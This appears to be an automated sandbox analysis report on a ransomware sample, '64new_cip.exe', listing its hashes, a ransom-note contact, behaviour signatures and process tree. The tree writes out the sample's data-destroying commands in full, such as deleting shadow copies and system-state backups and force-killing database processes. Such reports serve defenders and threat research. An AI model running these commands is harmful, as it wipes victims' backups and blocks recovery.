Analysis
-
max time kernel
91s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 11:01
Static task
static1
Behavioral task
behavioral1
Sample
64new_cip.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
64new_cip.exe
Resource
win10v2004-20220901-en
General
-
Target
64new_cip.exe
-
Size
309KB
-
MD5
fb13a3efdbb801aef77603f6aaea272e
-
SHA1
62f526f82da55e5e3bc835d0e3b770b236d5e99d
-
SHA256
eb5666adbcd60ab11747e32a63a98c0ff4b3949fdac0f6fb7f2b86246e34b51d
-
SHA512
3baaf4bf823895f6916519dd571f984b79dd6756b9b9944ab02b4f19bbac466a6417ce1d6525d29acb1b92788bf15134146ae495d654828c52774233d8a2b0d3
-
SSDEEP
6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l09K2yaw7c:v+vV9CZMuUxhC6SjZfjeu++3GK7aw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
64new_cip.exedescription pid process target process PID 4936 created 3068 4936 64new_cip.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2276 bcdedit.exe 4884 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 3580 wbadmin.exe 1332 wbadmin.exe -
Processes:
wbadmin.exepid process 4184 wbadmin.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
64new_cip.exedescription ioc process File renamed C:\Users\Admin\Pictures\RedoPush.crw => C:\Users\Admin\Pictures\RedoPush.crw.cipher 64new_cip.exe File opened for modification C:\Users\Admin\Pictures\SyncInstall.tiff 64new_cip.exe File renamed C:\Users\Admin\Pictures\SyncInstall.tiff => C:\Users\Admin\Pictures\SyncInstall.tiff.cipher 64new_cip.exe File renamed C:\Users\Admin\Pictures\TraceResume.raw => C:\Users\Admin\Pictures\TraceResume.raw.cipher 64new_cip.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
64new_cip.exedescription ioc process File opened (read-only) \??\F: 64new_cip.exe File opened (read-only) \??\G: 64new_cip.exe File opened (read-only) \??\H: 64new_cip.exe File opened (read-only) \??\P: 64new_cip.exe File opened (read-only) \??\Q: 64new_cip.exe File opened (read-only) \??\S: 64new_cip.exe File opened (read-only) \??\Z: 64new_cip.exe File opened (read-only) \??\B: 64new_cip.exe File opened (read-only) \??\J: 64new_cip.exe File opened (read-only) \??\L: 64new_cip.exe File opened (read-only) \??\T: 64new_cip.exe File opened (read-only) \??\U: 64new_cip.exe File opened (read-only) \??\W: 64new_cip.exe File opened (read-only) \??\X: 64new_cip.exe File opened (read-only) \??\A: 64new_cip.exe File opened (read-only) \??\K: 64new_cip.exe File opened (read-only) \??\M: 64new_cip.exe File opened (read-only) \??\N: 64new_cip.exe File opened (read-only) \??\O: 64new_cip.exe File opened (read-only) \??\Y: 64new_cip.exe File opened (read-only) \??\E: 64new_cip.exe File opened (read-only) \??\R: 64new_cip.exe File opened (read-only) \??\V: 64new_cip.exe File opened (read-only) \??\I: 64new_cip.exe -
Drops file in Windows directory 3 IoCs
Processes:
wbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2840 3068 WerFault.exe Explorer.EXE 680 4572 WerFault.exe explorer.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 948 vssadmin.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1696 taskkill.exe 3124 taskkill.exe 1952 taskkill.exe 4732 taskkill.exe 3080 taskkill.exe 4116 taskkill.exe 4160 taskkill.exe 816 taskkill.exe 444 taskkill.exe 1568 taskkill.exe 520 taskkill.exe 1104 taskkill.exe 964 taskkill.exe 4092 taskkill.exe 1476 taskkill.exe 1488 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{C6193E6C-B303-4195-914B-D9AC1A4DE0BD} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
64new_cip.exepid process 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe 4936 64new_cip.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeWMIC.exewbengine.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 4732 taskkill.exe Token: SeDebugPrivilege 3080 taskkill.exe Token: SeDebugPrivilege 4116 taskkill.exe Token: SeDebugPrivilege 4160 taskkill.exe Token: SeDebugPrivilege 816 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1104 taskkill.exe Token: SeDebugPrivilege 3124 taskkill.exe Token: SeDebugPrivilege 964 taskkill.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeDebugPrivilege 4092 taskkill.exe Token: SeDebugPrivilege 444 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeBackupPrivilege 4220 vssvc.exe Token: SeRestorePrivilege 4220 vssvc.exe Token: SeAuditPrivilege 4220 vssvc.exe Token: SeIncreaseQuotaPrivilege 4108 WMIC.exe Token: SeSecurityPrivilege 4108 WMIC.exe Token: SeTakeOwnershipPrivilege 4108 WMIC.exe Token: SeLoadDriverPrivilege 4108 WMIC.exe Token: SeSystemProfilePrivilege 4108 WMIC.exe Token: SeSystemtimePrivilege 4108 WMIC.exe Token: SeProfSingleProcessPrivilege 4108 WMIC.exe Token: SeIncBasePriorityPrivilege 4108 WMIC.exe Token: SeCreatePagefilePrivilege 4108 WMIC.exe Token: SeBackupPrivilege 4108 WMIC.exe Token: SeRestorePrivilege 4108 WMIC.exe Token: SeShutdownPrivilege 4108 WMIC.exe Token: SeDebugPrivilege 4108 WMIC.exe Token: SeSystemEnvironmentPrivilege 4108 WMIC.exe Token: SeRemoteShutdownPrivilege 4108 WMIC.exe Token: SeUndockPrivilege 4108 WMIC.exe Token: SeManageVolumePrivilege 4108 WMIC.exe Token: 33 4108 WMIC.exe Token: 34 4108 WMIC.exe Token: 35 4108 WMIC.exe Token: 36 4108 WMIC.exe Token: SeBackupPrivilege 4528 wbengine.exe Token: SeRestorePrivilege 4528 wbengine.exe Token: SeSecurityPrivilege 4528 wbengine.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe Token: SeShutdownPrivilege 4572 explorer.exe Token: SeCreatePagefilePrivilege 4572 explorer.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
explorer.exepid process 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
explorer.exepid process 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe 4572 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64new_cip.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4936 wrote to memory of 3176 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3176 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3176 4936 64new_cip.exe cmd.exe PID 3176 wrote to memory of 2804 3176 cmd.exe cmd.exe PID 3176 wrote to memory of 2804 3176 cmd.exe cmd.exe PID 4936 wrote to memory of 5036 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 5036 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 5036 4936 64new_cip.exe cmd.exe PID 5036 wrote to memory of 2392 5036 cmd.exe cmd.exe PID 5036 wrote to memory of 2392 5036 cmd.exe cmd.exe PID 2392 wrote to memory of 1952 2392 cmd.exe taskkill.exe PID 2392 wrote to memory of 1952 2392 cmd.exe taskkill.exe PID 4936 wrote to memory of 3844 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3844 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3844 4936 64new_cip.exe cmd.exe PID 3844 wrote to memory of 4468 3844 cmd.exe cmd.exe PID 3844 wrote to memory of 4468 3844 cmd.exe cmd.exe PID 4468 wrote to memory of 1476 4468 cmd.exe taskkill.exe PID 4468 wrote to memory of 1476 4468 cmd.exe taskkill.exe PID 4936 wrote to memory of 648 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 648 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 648 4936 64new_cip.exe cmd.exe PID 648 wrote to memory of 220 648 cmd.exe cmd.exe PID 648 wrote to memory of 220 648 cmd.exe cmd.exe PID 220 wrote to memory of 4732 220 cmd.exe taskkill.exe PID 220 wrote to memory of 4732 220 cmd.exe taskkill.exe PID 4936 wrote to memory of 3156 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3156 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3156 4936 64new_cip.exe cmd.exe PID 3156 wrote to memory of 4300 3156 cmd.exe cmd.exe PID 3156 wrote to memory of 4300 3156 cmd.exe cmd.exe PID 4300 wrote to memory of 3080 4300 cmd.exe taskkill.exe PID 4300 wrote to memory of 3080 4300 cmd.exe taskkill.exe PID 4936 wrote to memory of 4420 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 4420 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 4420 4936 64new_cip.exe cmd.exe PID 4420 wrote to memory of 2732 4420 cmd.exe cmd.exe PID 4420 wrote to memory of 2732 4420 cmd.exe cmd.exe PID 2732 wrote to memory of 4116 2732 cmd.exe taskkill.exe PID 2732 wrote to memory of 4116 2732 cmd.exe taskkill.exe PID 4936 wrote to memory of 2440 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 2440 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 2440 4936 64new_cip.exe cmd.exe PID 2440 wrote to memory of 4180 2440 cmd.exe cmd.exe PID 2440 wrote to memory of 4180 2440 cmd.exe cmd.exe PID 4180 wrote to memory of 4160 4180 cmd.exe taskkill.exe PID 4180 wrote to memory of 4160 4180 cmd.exe taskkill.exe PID 4936 wrote to memory of 3620 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3620 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 3620 4936 64new_cip.exe cmd.exe PID 3620 wrote to memory of 4108 3620 cmd.exe cmd.exe PID 3620 wrote to memory of 4108 3620 cmd.exe cmd.exe PID 4108 wrote to memory of 816 4108 cmd.exe taskkill.exe PID 4108 wrote to memory of 816 4108 cmd.exe taskkill.exe PID 4936 wrote to memory of 4400 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 4400 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 4400 4936 64new_cip.exe cmd.exe PID 4400 wrote to memory of 376 4400 cmd.exe cmd.exe PID 4400 wrote to memory of 376 4400 cmd.exe cmd.exe PID 376 wrote to memory of 1696 376 cmd.exe taskkill.exe PID 376 wrote to memory of 1696 376 cmd.exe taskkill.exe PID 4936 wrote to memory of 5104 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 5104 4936 64new_cip.exe cmd.exe PID 4936 wrote to memory of 5104 4936 64new_cip.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
64new_cip.exe64new_cip.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip.exe"C:\Users\Admin\AppData\Local\Temp\64new_cip.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlwriter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im postgres.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop ReportServer$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
-
